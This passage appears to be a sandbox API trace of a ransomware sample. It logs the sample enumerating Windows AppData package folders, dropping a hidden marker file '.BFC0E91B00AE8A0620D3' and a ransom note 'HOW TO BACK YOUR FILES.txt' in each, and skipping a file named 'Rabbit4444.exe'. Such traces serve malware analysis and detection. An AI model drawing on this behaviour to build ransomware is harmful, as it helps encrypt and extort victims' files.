lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\" [0065.429] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0065.429] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.430] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.433] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.434] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.434] CloseHandle (hObject=0x2a0) returned 1 [0065.434] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory") returned 97 [0065.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.434] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.435] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.435] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.435] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.435] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.435] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.435] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.435] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.435] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.435] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.435] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0522902, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0522902, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.435] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.435] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.435] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0522902, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0522902, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0522902, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.435] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.435] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.435] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.436] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.436] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.436] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.436] CloseHandle (hObject=0x2cc) returned 1 [0065.437] CloseHandle (hObject=0x2a0) returned 1 [0065.437] GetCurrentThreadId () returned 0xd98 [0065.437] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0065.437] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies" [0065.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0065.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0065.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies" [0065.437] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\" [0065.437] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0065.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.438] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.440] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.441] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.441] CloseHandle (hObject=0x2a0) returned 1 [0065.442] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies") returned 97 [0065.442] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.442] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0065.442] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.442] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.442] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.442] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.442] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.442] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.442] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.442] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.442] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.442] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.442] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0548b54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0548b54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.442] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.442] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.442] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0548b54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0548b54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.442] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0065.442] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.443] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.443] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.444] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.444] CloseHandle (hObject=0x2cc) returned 1 [0065.444] CloseHandle (hObject=0x2a0) returned 1 [0065.444] GetCurrentThreadId () returned 0xd98 [0065.444] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0065.444] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache" [0065.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0065.444] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0065.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache" [0065.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\" [0065.444] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0065.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.445] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.447] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.448] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.448] CloseHandle (hObject=0x2a0) returned 1 [0065.449] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache") returned 95 [0065.449] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.449] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0065.449] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.449] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.449] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.449] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.449] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x726dcc78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.449] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.449] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.449] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.449] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.449] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.449] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0548b54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0548b54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.449] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.449] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.449] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0548b54, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0548b54, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0548b54, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.449] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0065.449] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.450] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.450] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.450] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.451] CloseHandle (hObject=0x2cc) returned 1 [0065.451] CloseHandle (hObject=0x2a0) returned 1 [0065.451] GetCurrentThreadId () returned 0xd98 [0065.451] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cfe8 [0065.451] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe" [0065.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cfe0 | out: hHeap=0xe0000) returned 1 [0065.451] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe" [0065.451] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\" [0065.451] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0065.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.454] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.459] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.460] CloseHandle (hObject=0x2a0) returned 1 [0065.460] lstrlenW 